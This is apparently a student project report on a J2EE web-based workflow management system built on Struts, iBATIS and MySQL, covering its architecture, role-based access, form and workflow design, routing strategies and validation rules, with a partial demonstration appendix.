In 1995, continuing their efforts to provide common ground in the field of workflow, the WfMC published the Workflow Reference Model [WFMC-TC-1003] depicted in Figure 1 to illustrate the major components and interfaces of a generic WFMS architecture. The model suggests five interfaces, or functionalities, a WFMS should support:
- **Interface 1** is the process definition interface: to define, modify, or import a process definition that will be interpreted by the workflow enactment service.
- **Interface 2** is the workflow client interface: to present pending tasks to workflow participants for viewing or processing purposes.
- **Interface 3** is the invoked application interface: to interact with other applications, such as the ability to invoke a messaging service to notify participants of their tasks.
- **Interface 4** is the workflow enactment service interface: to interact with other workflow systems.
- **Interface 5** is the administration tool and monitoring interface: to support process monitoring and management utilities for operating the entire WFMS system.
The five interfaces surround the core of the WFMS, a workflow enactment service comprised of one or more workflow engines. The responsibility of the workflow enactment service is to coordinate actions among the workflow engines that interpret the process definition and activate external resources.
1.2 Related Work
There are many commercial WFMS products available and the list of open source products is growing [e.g., Perez, Topicus, Baeyens04]. Very few claim to be complete WFMSs; most position themselves as workflow engines. In the review of seven open source Java-based workflow products [EnhydraShark, jBPM, JFolder, OpenWFE, wfmOpen, XFlow, YAWL], not one offered the end user a complete WFMS solution, implemented with the recommended interfaces of the Workflow Reference Model and without the need for technical knowledge or systems development skills. Instead, most adopted a minimalist view of the scope of a WFMS by providing a framework that leaves much of the implementation details to the users of the system. It is worth mentioning that there are two levels of "users" of WFMS, namely developers, who must customize WFMS frameworks to generate actual workflow applications, and end users, who will use the system as part of a BPM approach within an organization. The motivation and focus of this project has been on the needs of the latter, by empowering them with the ability to build their own workflow systems without the intervention of developers (the former).
1.3 System Overview: Our Approach
The goal of this project was to develop a customizable web-based document WFMS. Web-based document management technology is concerned with managing the lifecycle of documents, which are represented in our system through the use of web forms. The workflow enactment service is responsible for routing all or part of a form among individuals for approval, processing, or collaboration. Rules govern which parts of a form are required by a particular role. In addition, complex or simple workflow routing decisions are made based on form data.
Our system differs from other open source workflow products in a number of ways. First, it was designed to specifically address document management workflow technology. Web forms provide the means for collecting data from the participant. The workflow enactment service is responsible for displaying all or part of a form as well as routing the form among participants. In contrast, the reviewed open source workflow projects do not address specific workflow system technology.
Second, our system fully implements three of the prescribed WfMC's Workflow Reference Model interfaces through a centralized, web-based application interface. It presents the end user with different functionality depending on one of three user types: administrator, workflow engineer, and standard workflow participant. The standard workflow participant interface addresses Interface 3 of the Workflow Reference Model. It provides the ability to manage workflow tasks. The workflow engineer interface addresses Interface 1 of the Workflow Reference Model. It provides the ability to define a form, a workflow, and a process definition. The administrator interface addresses Interface 5 of the Workflow Reference Model. It provides the ability to monitor workflow progress and to perform such tasks as user and system management.
Finally, our system uses a different approach to defining and evaluating workflow rules. All reviewed open source workflow systems define routing decisions within the process definition itself. The problem with this approach is that it limits the reusability of the same definition among other workflows. Our project implements a new process definition approach. It uses three separate definitions to make up the entire workflow: a form definition, a workflow definition, and a process definition. Form and workflow definitions are created independently of one another. Once created, the process definition bridges a unique form with a unique workflow. Rules are defined within the process definition. This approach encourages the reusability of individual forms and workflows. In addition, it extends the rule definition possibilities to include form validation, as well as routing decisions.
Chapter 2
SYSTEM ARCHITECTURE
2.1 Technologies Used
The system we constructed, the Workflow Generator and Tracking System, is a web-based system developed using the Eclipse IDE [Eclipse]. The Java 2 Enterprise Edition (J2EE) provides the programming back-end for the web browser-based user interface. The J2EE environment is provided through a Jakarta Tomcat 5.5 (version 5.5.9) [Tomcat] application server. Tomcat 5.5 requires Java 2 Standard Edition Runtime Environment (JRE) version 5.0 or later.
Persistent data is stored in a MySQL 5.0 (version 5.0.11-beta) [MySQL] InnoDB database. The data is accessed from the J2EE program via the Connector/J JDBC (version 3.1.10) [MySQL Connector/J] connection interface. Both the iBATIS Data Mapper framework (version 2.0) [iBATIS] and the iBATIS Data Access framework (version 2.0) were used to significantly reduce the amount of Java code needed to access the database. Using eXtensible Markup Language
(XML) descriptor files, the iBATIS software mapped Java Beans to SQL statements as well as provided a data access abstraction layer.
Apache Software Foundation's Struts framework with Tiles (version 1.1) [Struts] was used to provide the view and controller components of the architecture. The overall system structure is an implementation of the Model-View-Controller (MVC) software architecture. With this architecture, the interface (view) is loosely coupled to the business logic (controller) and the business logic is loosely coupled to the data (model). The Struts framework provides a controller component for web-based applications that use a J2EE compliant application server. Tiles are view components that allow the interface to be assembled "in pieces." The framework uses an XML configuration file to organize, lay out, and reuse the individual components or tiles. Tiles for headers, footers, and navigation bars were placed in the same location on all pages to provide a consistent display format.
The user interface is implemented using Java Server Pages (JSP) (version 2.0), part of the J2EE platform, and Cascading Style Sheets (CSS). The Struts framework
provides several JSP tag libraries to simplify access to controller and data objects from within JSP. In addition, the project utilizes the Java Standard Tag Library (JSTL) [JSTL], as well as the Struts Layout Tag Library [StrutsLayout]. JavaScript is used sparingly throughout the project. CSS was implemented to give end users the ability to customize the look and feel of their system without having to modify the JSP. The project’s main logo as well as the CSS table-less design were adopted for use from the tutorials presented on the MaxDesign website [MaxDesign].
2.2 Architecture
At the highest level, the tracking system implements the MVC design pattern. The view layer is the user interface. The view never directly interacts with the model, which is the database. Data that is changed or events that occur in the view component are sent to the appropriate controller component. The controller determines what action should be taken for the event. The controller, through defined action form classes, passes control to the business layer. The business layer calls methods on the Data Access Object (DAO) interface in order to pass and receive data from the
model component. The implementation of this architecture can be seen in Figure 2.
As a brief description of the Struts framework, the framework relies on one or more XML configuration files that associate three main components: Action classes, Form classes, and JSP or Tile names. When a JSP document is requested from the server, it is requested via an action
call. The action call is defined in the configuration file along with a fully qualified action class name and a fully qualified action form class name. The controller executes the appropriate action method then instantiates the associated action form object. In addition, it is the controller's responsibility to determine the appropriate page to display before passing the request to the server.
The server is responsible for evaluating the JSP tags, which determine which elements are displayed, and for emitting any embedded JavaScript. The document is then rendered as an HTML page containing data fields on a form and presented to the user. When the form is submitted, another action is called. The controller populates the instantiated action form object with the appropriate form values using JavaBean property methods. The action form can then interact with the business layer as designed.
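The association just described can be sketched as a fragment of a Struts 1.1 configuration file. The action path, class names, and forwards below are illustrative assumptions, not definitions taken from the actual system:

```xml
<!-- Hypothetical struts-config.xml fragment illustrating the
     action / form / view association described above. -->
<form-beans>
  <form-bean name="loginForm" type="app.presentation.LoginForm"/>
</form-beans>

<action-mappings>
  <action path="/login"
          type="app.controller.LoginAction"
          name="loginForm"
          scope="request"
          validate="true"
          input="/login.jsp">
    <forward name="success" path="/taskList.jsp"/>
    <forward name="failure" path="/login.jsp"/>
  </action>
</action-mappings>
```

When the `/login` action is requested, the controller instantiates the named form bean, invokes the action class, and selects one of the declared forwards to render.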
The business layer design for this project was modeled after the iBATIS JPetStore 4.0.5 [iBATIS] example. The domain classes are the entities of the workflow application. Each domain class represents a JavaBean. Each domain class contains only variables that define its properties as well as "getter" and "setter" methods. The
domain objects are utilized by both the model and business layer components.
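A domain class of the kind described might look like the following sketch; the class and property names are invented for illustration and follow the JavaBean pattern of properties plus "getter" and "setter" methods only:

```java
// Illustrative workflow domain JavaBean: properties with getters
// and setters only, as described in the text. The names here are
// assumptions, not taken from the actual system.
class WorkflowState {
    private int stateId;
    private String name;
    private boolean initial;

    public int getStateId() { return stateId; }
    public void setStateId(int stateId) { this.stateId = stateId; }
    public String getName() { return name; }
    public void setName(String name) { this.name = name; }
    public boolean isInitial() { return initial; }
    public void setInitial(boolean initial) { this.initial = initial; }
}
```

Because the bean carries no behavior, the same object can be passed freely between the business layer and the model layer.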
Each presentation class extends the Struts ActionForm class. The controller uses the presentation class to retrieve, populate, and present data in the view component of the architecture. Initially, the action class calls a method in the presentation class to handle the business logic. The presentation class, in turn, interacts with the service class each time access to the model layer is requested. Finally, the service class utilizes the DAO interfaces to extract information from the database.
Access to the database has been implemented using the Data Access Object pattern [Gamma95] with iBATIS’ Data Access Objects API and SQL Data Mapper framework. The DAO API provides for the dynamic configuration of various persistence mechanisms. Since the service classes interact only with the DAO interface, the actual implementation details are hidden from the rest of the application. This project uses the iBATIS SQL maps as its persistence mechanism. The SQL map DAO class methods interact directly with the SQL Data Mapper framework.
The SQL Data Mapper framework uses one or more XML configuration files to map domain objects to SQL tables or query results. For this project, multiple configuration files were used to represent either a single table in the database or a collection of related tables. Each configuration file contains an XML mapping of table column names to domain object property names, as well as the defined SQL queries for the appropriate tables. A separate XML file holds the database connection properties that also support the configuration of various Database Management Systems (DBMS).
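As an illustration of such a configuration file, the following hypothetical iBATIS 2.0 SQL map fragment maps an invented domain bean to an invented table and defines one named query; none of the names below are taken from the actual system:

```xml
<!-- Hypothetical iBATIS SqlMap fragment mapping a domain bean
     to a table and defining one named query. -->
<sqlMap namespace="WorkflowState">
  <resultMap id="stateResult" class="app.domain.WorkflowState">
    <result property="stateId" column="STATE_ID"/>
    <result property="name"    column="STATE_NAME"/>
    <result property="initial" column="IS_INITIAL"/>
  </resultMap>

  <select id="getStatesByWorkflow" parameterClass="int"
          resultMap="stateResult">
    SELECT STATE_ID, STATE_NAME, IS_INITIAL
    FROM WORKFLOW_STATE
    WHERE WORKFLOW_ID = #value#
  </select>
</sqlMap>
```

A DAO method would then invoke the query by its namespace-qualified name and receive populated `WorkflowState` beans in return.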
Whenever the service class calls a method on the DAO interface, the implemented SQL Map DAO passes the name of the query and any parameters to the framework. The Data Mapper framework does the rest. It performs the necessary database connection operations (open, close, as well as pooling), executes the query, and returns a populated domain object as a result.
The Workflow Generator and Tracking System was built to align with the Workflow Reference Model, as Figure 3 shows. It fully implements three of the five recommended interfaces. Interface 5 provides the administration and management tools of the application. In order to demonstrate interactions with organizational or resource data, this application provides user management and system management capabilities to those with Administrator level access. Interface 1 provides the workflow definition tools of the application. Workflow Engineers have the ability to create form definitions, workflow definitions, and process definitions. In addition, they are responsible for creating roles for use in the creation of a workflow. Interface 2 provides task management functionality for users of the workflow system. The Workflow Generator and Tracking System produces each workflow so it may be accessed as its own, unique web-based system. Within the customized system, users in the appropriate roles have the
ability to create a new instance of a workflow, view an instance of a workflow, modify an instance of a workflow, and transition an instance of a workflow.
The workflow enactment service is made up of six engines that handle the various requests of the system. The Resource Engine handles all user related tasks. This includes such things as logging in and out of the system, as well as creating and modifying user accounts. The Form Engine handles all tasks related to the creation of a form.
The Workflow Engine handles all tasks related to the creation of a workflow. The Process Engine handles all tasks related to the creation of a process definition. The System Engine handles all tasks related to the creation of a new system. The Custom App Engine handles all tasks associated with individual workflow task management, such as viewing, transitioning, and assigning a workflow task.
The database contains forty tables that are used to store information regarding users, forms, workflows, processes, rules, systems, and workflow instances. The design supports the creation of multiple workflows independent of application domain and without the need for additional tables, by extracting the common elements shared among instances and storing all form values as text in a single table. Appendix A represents a logical diagram of the database.
3.1 Security and Encryption
The Workflow Generator and Tracking System provides three access levels: administrator, workflow engineer, and standard user. Those with standard user privileges, upon log in, are restricted to accessing published systems and their associated workflows only. Users with workflow engineer privileges are granted access to the form management, workflow management, and definition management tools. Users with administrative access have all privileges plus access to system management and user management tools. A single, super user was also created for the system.

All users have the ability to edit their personal account information, including changing their password. Each individual is responsible for selecting her security question and answer at her initial log in. This information is maintained for use in the event a person forgets her password. The security information is private and is not accessible to the administrator at any time. All system passwords and security answers are hashed in the database using the MD5 algorithm.
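As an illustration of this approach, the following sketch hashes a value with MD5 and renders the digest as hexadecimal text. The class and method names are invented, not the system's actual code:

```java
// Minimal sketch of hashing a password with MD5 before storage,
// as described in the text. Names here are illustrative assumptions.
class PasswordHasher {
    static String md5Hex(String input) {
        try {
            java.security.MessageDigest md =
                java.security.MessageDigest.getInstance("MD5");
            byte[] digest = md.digest(input.getBytes("UTF-8"));
            StringBuilder hex = new StringBuilder();
            for (byte b : digest) {
                hex.append(String.format("%02x", b));  // two hex digits per byte
            }
            return hex.toString();
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }
}
```

Note that MD5 is a one-way hash rather than true encryption: a stored value can be compared against the hash of a submitted password, but the original password cannot be recovered from it.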
3.2 User Management
The User Management option is available only to Administrators. In this component, Administrators have the ability to create, edit, activate, and de-activate users of the Workflow Generator and Tracking System. The information stored for each user includes first name, last name, phone number, email, username, password, password confirmation, access level, and active status.

Within this component, Administrators also have the ability to create new and edit existing user groups. Administrators can add individual users or existing groups as members of another group. They also have the ability to remove members from a group. The application provides two system-defined groups: the All User group and the System Level - Admin group. As a user is created, she is added to the All User group. The All User group provides a convenient way to access all users of the system. An Administrator can also grant administrative access at the individual system level by placing a user or group in the System Level - Admin group.
3.3 System Management
The System Management component gives the Administrator the ability to create, edit, activate, and de-activate custom systems that operate "outside of" the Workflow Generator and Tracking System. When defining a new system, the Administrator creates a website name and chooses a style sheet for a custom "look and feel." Once created, the new system appears as a selection under the Select System menu option. The Administrator can then associate one or more published process definitions with the newly created system. Any user, including those with Standard User permissions, can link to and begin using the newly created web-based system for task management.
3.4 Definition Modes and Versions
The Workflow Generator and Tracking System houses three definitions that together comprise a workflow: a form definition, a workflow definition, and a process definition. Each definition has been designed to support three modes: design mode, test mode, and published mode. In design mode, anything is possible. The Workflow Engineer can add, modify, or delete any part of a definition. In test mode, the definition cannot be modified except to be placed back into design mode. In published mode, some modifications are permitted, depending on the type of definition; however, a published definition can never return to any of its previous states. It will remain permanently in published mode.
When a Workflow Engineer initiates the creation of a definition, it begins in design mode. Definitions in design mode are not visible to any other component. When a form or workflow definition is ready for testing, the engineer places the definition into test mode. In test mode, it becomes visible to the process definition component. The Workflow Engineer can now assemble the process definition comprised of a single form and a single workflow.
When the process definition is ready for testing, the engineer would normally place it in test mode. Due to time constraints, however, the test feature was not implemented. At this point, the engineer must bypass the test phase and publish the definition. When the engineer places the process definition into published mode, the associated form and workflow are published as well.
The system was also designed to support versioning of each type of definition. The idea was to allow new versions of a published definition to be created and published alongside an already existing version. This can be demonstrated; however, the GUI tools for creating additional versions could not be built, again due to time constraints.
3.5 Form Management
The Form Management component provides a Workflow Engineer with the tools to create forms. An Engineer can create, edit, and delete any form in design mode. Published forms may be modified; however, editing capabilities are limited. Forms are built incrementally using the designer interface. Forms support multiple pages, sections, and controls. There are eleven choices for form controls: Checkbox, Currency, Date, Double, Dropdown, Email, Float, Integer, Radio, Text, and Text area. The controls generate HTML form objects and provide built-in validation. For example, by selecting the Email control, the form engine will generate a text box for data collection and ensure that any data entered passes email validation. If the Integer control were selected, the form engine would generate a similar text box for data collection; however, it would ensure the information collected passes integer validation instead. Workflow Engineers also have the ability to customize their own lists for Dropdown, Radio, and Checkbox controls. In addition, they have the ability to add labels, tool tips, and default values, as well as to size and order their controls on the form.
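The built-in validation described above might be sketched as follows; the regular expression and method names are assumptions for illustration, not the system's actual code:

```java
// Rough sketch of per-control validation for the Email and Integer
// controls described in the text. Names and the email pattern are
// illustrative assumptions.
class ControlValidator {
    // Email control: the collected text must look like an address.
    static boolean isValidEmail(String value) {
        return value != null && value.matches("^[\\w.+-]+@[\\w-]+(\\.[\\w-]+)+$");
    }

    // Integer control: the collected text must parse as an integer.
    static boolean isValidInteger(String value) {
        try {
            Integer.parseInt(value);
            return true;
        } catch (NumberFormatException e) {
            return false;
        }
    }
}
```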
3.6 Workflow Management
The Workflow Management component provides a Workflow Engineer with the tools to create workflows. An Engineer can create, edit, and delete any workflow in design mode. Published workflows may be modified; however, editing capabilities are limited. Workflows are built incrementally using the designer interface. Workflows are comprised of three main parts: states, transitions, and workflow pattern strategies [van der Aalst].
3.6.1 States
A state represents a transitioning point in a workflow. Each state is dependent upon a participant responsible for signaling the end of a task. This system supports multiple states, one of which must be indicated as the initial state.
Each state is associated with a given role. Roles are comprised of one or more individuals or groups in an organization. At each state, the Workflow Engineer determines whether or not a given role should have the permission to cancel a workflow instance, close a workflow instance, or reassign a workflow instance to another participant within the same role. In addition to providing the tools to manage states, this system provides the Workflow Engineer with the ability to create and manage roles.
3.6.2 Transitions
A transition occurs when a participant has signaled the completion of a task. The workflow moves from one state to the next state according to the defined path. The Workflow Engineer defines a transition by indicating a "from state" and a "to state." There can be multiple transitions originating from a single state, as well as multiple transitions converging on a given state. The next two sections discuss assignment and transition strategies.
3.6.2.1 Assignment Strategies
This system implements three assignment strategies: Pull, Push, and Auto-Lookup. The Pull strategy [Muehlen04] routes tasks to a general queue without requiring the name of a specific individual. The general queue holds all unassigned tasks until a role member is able to assign the task to herself. The tasks are available only to individuals who are part of the associated role. Once checked out, the workflow instance for that state becomes the responsibility of the individual user. Once assigned, the task is no longer available to other role members.
The Push strategy [Muehlen04] requires that the transitioning role member manually assign the instance to a role member in the next state. Upon transition, the system presents the current participant a list of individuals to choose from. Once selected, the system transitions the instance to the next state and the task appears in the queue of the selected participant.
The Auto-Lookup strategy is not based on any research. It was included to demonstrate a third assignment strategy. The Auto-Lookup strategy automatically assigns the instance
to the next role member, if the list of participants is made up of only a single member or if the state has been visited previously by the current instance.
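The three assignment strategies can be sketched, under invented names and a much-simplified interface, as follows; a `null` return stands for "leave the task in the role's general queue":

```java
// Illustrative simplification of the Pull, Push, and Auto-Lookup
// assignment strategies described in this section. All names and the
// strategy encoding are assumptions, not the system's actual design.
class Assignment {
    static String assign(String strategy, java.util.List<String> roleMembers,
                         String chosen, String previousAssignee) {
        if (strategy.equals("PULL")) {
            return null;            // task waits in the role's general queue
        }
        if (strategy.equals("PUSH")) {
            return chosen;          // transitioning user picked a member explicitly
        }
        // AUTO_LOOKUP: assign automatically when the answer is unambiguous
        if (roleMembers.size() == 1) return roleMembers.get(0);
        if (previousAssignee != null) return previousAssignee;
        return null;                // otherwise fall back to the general queue
    }
}
```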
3.6.2.2 Transition Strategies
In addition to the assignment strategies, there exist six recognized transition strategies: Deferred Choice, And Split, Or Split, Sequence, Merge-First Wins, and Merge-Last Wins. All of the implemented strategies are based on published workflow pattern research [van der Aalst].
The Sequence strategy is implemented by the system any time there is a single transition originating from a given state. Since there is only one decision path for the given state, the system automatically transitions to the next state.
The And Split and Or Split strategies are necessary when there are multiple transitions originating from a given state. If multiple transitions exist, the system presents the Workflow Engineer with a choice of using the Or Split strategy or the And Split strategy. If the And Split strategy is selected, no further rules are required. At
the time of transition, the workflow instance will automatically transition to all states included as part of the And Split strategy. If the Or Split strategy is selected, the Workflow Engineer must define at least one transition rule for each transition included as the Or Split strategy. Rule definition occurs at the next stage, during the creation of the process definition.
The Merge-First Wins and the Merge-Last Wins strategies are necessary when there are multiple transitions converging on a given state. If multiple transitions exist, the system presents the user with a choice of using the Sequence strategy, the Merge-First Wins strategy, or the Merge-Last Wins strategy. The engineer can decide which, if any, transitions should participate in a merge. The Merge-Last Wins strategy prevents the workflow instance from transitioning to the next node until all states participating in the merge have indicated completion of their task. At the time the final merge participant signals completion, the instance transitions to the next state. The opposite is true of the Merge-First Wins strategy. Once the very first merge participant indicates completion of their task, the instance transitions to the next state. The remaining participants are still required
to complete their task; however, the instance closes silently without transitioning to the next state.
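The merge behavior described above can be sketched as follows; the class design is an illustrative simplification, not the system's implementation:

```java
// Simplified sketch of the two merge strategies: a merge tracks which
// participating states have signaled completion. Under "first wins" the
// transition fires on the first signal and later signals close silently;
// under "last wins" it fires only once every participant has signaled.
class Merge {
    private final java.util.Set<String> pending;
    private final boolean firstWins;
    private boolean fired = false;

    Merge(java.util.Collection<String> participatingStates, boolean firstWins) {
        this.pending = new java.util.HashSet<String>(participatingStates);
        this.firstWins = firstWins;
    }

    /** Returns true if this completion signal should trigger the transition. */
    boolean signalComplete(String state) {
        pending.remove(state);
        if (firstWins) {
            if (fired) return false;   // later arrivals close silently
            fired = true;
            return true;
        }
        return pending.isEmpty();      // last wins: fire only when all are done
    }
}
```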
The Deferred Choice strategy is the only strategy that presents a list of transition choices to the user, prior to her decision to transition to the next state. All other transition strategies are calculated by the system after the user signals the completion of the task. In other words, for these strategies, transition choices are not visible to the user. To implement a deferred choice strategy, the Workflow Engineer must select yes to the deferred choice option on the transition tab.
3.7 Definition Management
The Definition Management component provides a Workflow Engineer with the tools to create a process definition. An Engineer can create, edit, and delete any process definition in design mode. Published process definitions may be modified; however, editing capabilities are limited. Process definitions are comprised of a single form and a single workflow. Once the form and the workflow have been selected, the Workflow Engineer can create the rules that govern each. The Definition Management component gives the
engineer the ability to create, edit, or delete form as well as transition rules. All rules are based on information contained in the form.
3.7.1 Transition Rules
Transition rules are required only when an Or Split transition strategy has been indicated for the given workflow. The creator must define at least one rule for each transition involved in the Or Split group. If the rule evaluates to true upon transition, the transition path will be selected. The rules may be defined to be exclusive or multiple paths may evaluate to true. The implementation is in the hands of the Workflow Engineer.
3.7.2 Form Rules
Form rules are optional. As described within the form management section, the system provides for basic validation according to control type. For example, a date control will check for valid date entries. However, if a Workflow Engineer would like to make a particular form field required, she must define an additional form rule. In addition, the Workflow Engineer has the option of
selecting whether a form rule should be evaluated on every transition or only on a given transition.
3.7.3 Rule Definition
The methods for defining form rules and transition rules are exactly the same. This system's rule implementation approach is modeled after the ASP.NET Validation Server Controls [MSDN]. The Workflow Engineer can choose to implement the Required Validator, the Compare Validator, or the Range Validator.
3.7.3.1 The Required Validator
The Required Validator is the simplest of all validation types. It checks to make sure the form field has been populated. If validation fails, a custom error message, as defined by the engineer, will be displayed to the user.
3.7.3.2 The Compare Validator
The Compare Validator is used when a given form control needs to be compared to another form control or value,
based on the following operator types: Equal, Not Equal, Greater Than, Greater Than Equal, Less Than, and Less Than Equal. If the given form control is to be compared to another form control, the system presents the Workflow Engineer with a list of controls matching the given control type. On the other hand, if the given form control is to be compared to a value, the Workflow Engineer must enter a value appropriate for the given control type.
3.7.3.3 The Range Validator
The Range Validator is used when the given form control must be validated according to a lower bound and an upper bound of values. The Workflow Engineer must select both a minimum and maximum value appropriate for the given control type. For both the Compare Validator and the Range Validator, if validation fails, a custom error message is presented to the user.
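Reduced to numeric values for illustration, the Compare and Range validators might be sketched as follows; the operator codes and method names are assumptions, not the system's actual design:

```java
// Minimal sketch of the Compare and Range validators described above.
// Operator codes are invented shorthand for the six operator types.
class RuleValidator {
    static boolean compare(double a, String op, double b) {
        if (op.equals("EQ"))  return a == b;
        if (op.equals("NEQ")) return a != b;
        if (op.equals("GT"))  return a > b;
        if (op.equals("GTE")) return a >= b;
        if (op.equals("LT"))  return a < b;
        if (op.equals("LTE")) return a <= b;
        throw new IllegalArgumentException("Unknown operator: " + op);
    }

    static boolean inRange(double value, double min, double max) {
        return value >= min && value <= max;
    }
}
```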
3.8 Task Management
The Workflow Generator and Tracking System uses the information collected by the Workflow Engineer and the Administrator to produce the Task Management interface as a
separate, functioning web system. The component itself may house one or more process definitions. For each definition, users with Standard User permission have the ability to select a workflow, create a new instance of a workflow, modify an existing instance of a workflow, view the history and comments associated with a workflow, as well as the ability to assign and transition a workflow. Tasks are initialized using the Add New Instance option. Instances of each document are created and managed according to the form, workflow, and process definitions. Tasks remain open until a user successfully closes or cancels the instance.
Chapter 4
CONCLUSIONS
4.1 Summary
In summary, after researching various approaches to building this class of systems, we found that while the scope of a workflow varies among products, all appear to share the ability to define a process and a set of classes that can interpret the generated definitions. Some provide only the workflow engine API. Others offer more of a framework, along the lines of the WfMC Reference Model. In either situation, the end user is dependent upon the system developer to produce a functioning WFMS. Our observation was that current open source workflow products seemed to exist as tools for the system developer interested in workflow, rather than as a solution for the end user in need of a WFMS.
The goal of this project was to use an EUD approach to produce a complete, out-of-the-box WFMS solution for web-based document management. Its main purpose was to give the business-oriented end user the ability to automate
workflow without the need to program. The Workflow Generator and Tracking System accomplishes this goal. It specifically addresses three types of users: administrators, workflow engineers, and standard workflow participants, by providing the appropriate tools for monitoring, developing, and coordinating automated workflow tasks. In addition, it incorporates information (the form), as well as organization (the participants) within the overall process (workflow) design to produce a complete WFMS [Hollingsworth04].
4.2 Future Enhancement Recommendations
The author acknowledges the scope of this project was greater than initially anticipated. The overall size of the effort did not allow for the implementation of every feature originally envisioned or specified in the proposal. In particular, desirable features that were not implemented include a scheduler of tasks, a method to recall transitioned tasks, the end user tools to create definition versions, the ability to operate in test mode, and the full implementation of notification strategies such as email.
Although the list above appears lengthy, the items on it were close to being within reach. For example, the current system design allows for versioning support of all definition types. However, the GUI tools that would have allowed the end user to create them have not been developed.
Recommendations for future enhancements include incorporating more transition and assignment options, enhancing rule functionality, incorporating recall options, implementing messaging services, implementing visibility and edit constraints on form fields according to role, and implementing a task scheduler.
REFERENCES
[Baeyens04]
http://www.theserverside.com/articles/article.tss?l=Workflow
[Eclipse]
http://www.eclipse.org/
[EnhydraShark]
http://shark.objectweb.org/
[Gamma95]
Gamma, E., Helm, R., Johnson, R., and Vlissides, J., Design Patterns: Elements of Reusable Object-Oriented Software, Addison-Wesley, 1995.
[Hollingsworth04]
Hollingsworth, D., "Workflow Reference Model: 10 Years On," The Workflow Handbook 2004, Workflow Management Coalition, 2004.
[iBATIS]
http://ibatis.apache.org/
[jBPM]
http://www.jboss.com/products/jbpm
[JFolder]
http://www.powerfolder.org/
[JSTL]
http://jakarta.apache.org/
[MaxDesign]
[MSDN]
http://msdn.microsoft.com/
[Muehlen04]
[MySQL]
http://www.mysql.com/
[MySQL Connector/J]
[OpenWFE]
http://web.openwfe.org/
[Perez]
[Repenning04]
[Struts]
http://struts.apache.org/
[StrutsLayout]
http://struts.application-servers.com/
[Tomcat]
http://tomcat.apache.org/
[Topicus]
http://www.topicus.nl/topwfm/
[van der Aalst]
http://is.tm.tue.nl/research/patterns/patterns.htm
[WfMC]
http://www.wfmc.org
[WFMC-TC-1003]
[wfmOpen]
http://wfmopen.sourceforge.net/
[XFlow]
http://xflow.sourceforge.net/
[YAWL]
APPENDIX A

Figure A1: Database Logical Model
APPENDIX B
SYSTEM DEMONSTRATION
REQUEST A DAY OFF WORKFLOW EXAMPLE
Log In
When a user accesses the website, the system presents the user with a log in screen shown in Figure B1. At initial log in, the user must enter the username and password assigned to her by the system administrator.
Figure B1: The Log In Screen
Register Account
When a user accesses the system for the first time, she is presented with the screen shown in Figure B2 that displays her information. The system requires the user to update any incorrect information, modify and confirm her password, and select a security question and answer. The security question and answer are stored in the event the user forgets her password. When the user has completed her changes, she selects the register account option to return to the log in screen.
Figure B2: Register Account Screen
Access Levels
Figures B3, B4, and B5 show the navigational views according to user access level.
Figure B3: The Standard User View
Figure B4: The Workflow Engineer View
Figure B5: The Administrator View
User Management
The User Management menu gives the Administrator two options: Manage Users and Manage Groups.
Manage Users
The User tab shown in Figure B6 is the tool used to add or edit users. When adding a new user, the administrator populates all of the fields and chooses one of the three provided access levels. She also has the ability to edit any existing user by selecting her from the drop down list of active users. The Administrator can de-activate any existing user by un-selecting the Active checkbox.
Figure B6: The Manage User - User Tab
The User Groups tab is shown in Figure B7. This screen displays the current user groups for the selected user, as well as allows the Administrator the ability to add and remove groups as needed. Each new user added to the system is automatically placed in the All Users group.
Figure B7: The Manage User - User Groups Tab
Manage Groups
The Group tab is shown in Figure B8. The Administrator adds and modifies groups within this interface. To add a new group, she enters a group name and an optional description. To edit a group, she selects it from the list provided, makes changes, then updates.
Figure B8: The Manage Groups - Group Tab
The Account Members tab, Figure B9, and the Group Members tab, Figure B10, allow the Administrator to add individual and group members by selecting a member, then selecting the add button. She may also remove members from the group by selecting the current member, checking the Remove Member checkbox, then selecting the update button.
Figure B9: The Manage Groups - Account Members Tab
Figure B10: The Manage Groups - Group Members Tab
System Management
The System Management menu gives the Administrator one option: Manage Systems.
Manage Systems
The System tab shown in Figure B11 is the tool used to add or edit systems. Each system created will appear in the Select A System menu on the navigational bar for all users. The Task Management component is enacted within the custom generated system. To add a new system, the Administrator enters a label, an optional description, a title for the web system, and the name of a style sheet, then selects the add system button. This information may also be edited for existing systems. Administrators can also activate and de-activate existing systems.
Figure B11: The Manage Systems - System Tab
The System Processes tab is shown in Figure B12. This screen allows the Administrator to associate any published process definitions with the given system. The Administrator chooses a process definition from the list of published definitions, then selects the add process button. Administrators may also remove process definitions from existing systems by selecting the remove option, then the update button.
Figure B12: The Manage Systems - System Processes Tab
Form Management
In order to demonstrate the form management tools, we will build a simple form for requesting a day off. It will be one page containing two sections, one for the Employee and one for the Manager. The Employee section will have three controls: a dropdown list control, containing the type of request; a date control, indicating the start date of the request; and a second date control, indicating the end date of the request. The Manager section will have a text area control for comments that will be required in the event the Manager rejects the request.
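The report does not show the system's internal representation of a form; as a rough illustration, the hierarchy just described (a page containing sections, each containing typed controls) could be modeled along the following lines. All class and field names here are hypothetical, not the system's actual API:

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical model of the form hierarchy: a Page owns ordered
// Sections, and each Section owns ordered Controls of a given type.
enum ControlType { DROPDOWN, DATE, TEXTAREA }

class Control {
    final String label;
    final ControlType type;
    Control(String label, ControlType type) { this.label = label; this.type = type; }
}

class Section {
    final String label;
    final List<Control> controls = new ArrayList<>();
    Section(String label) { this.label = label; }
}

class Page {
    final String label;
    final List<Section> sections = new ArrayList<>();
    Page(String label) { this.label = label; }
}

public class DayOffFormSketch {
    public static void main(String[] args) {
        Page pageOne = new Page("pageone");

        Section employee = new Section("Employee Information");
        employee.controls.add(new Control("Request Type", ControlType.DROPDOWN));
        employee.controls.add(new Control("Start Date", ControlType.DATE));
        employee.controls.add(new Control("End Date", ControlType.DATE));

        Section manager = new Section("Manager Information");
        manager.controls.add(new Control("Reason For Denial", ControlType.TEXTAREA));

        pageOne.sections.add(employee);
        pageOne.sections.add(manager);

        System.out.println(pageOne.sections.size());  // prints 2
        System.out.println(employee.controls.size()); // prints 3
    }
}
```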
The Form Management menu gives the Workflow Engineer three options: Design Form, Modify Published Form, and Manage Form Lists.
Manage Form Lists
The Category tab is shown in Figure B13. Workflow Engineers can create their own lists for use within Dropdown, Radio, or Checkbox controls. For this example, we need to create a list that contains each of the day off request types. We must enter the required information and select the add button.

The Item tab is shown in Figure B14. Within this tab, we add each of our custom day off request types. We will enter two types: Personal Day and Vacation Day.
Design Form
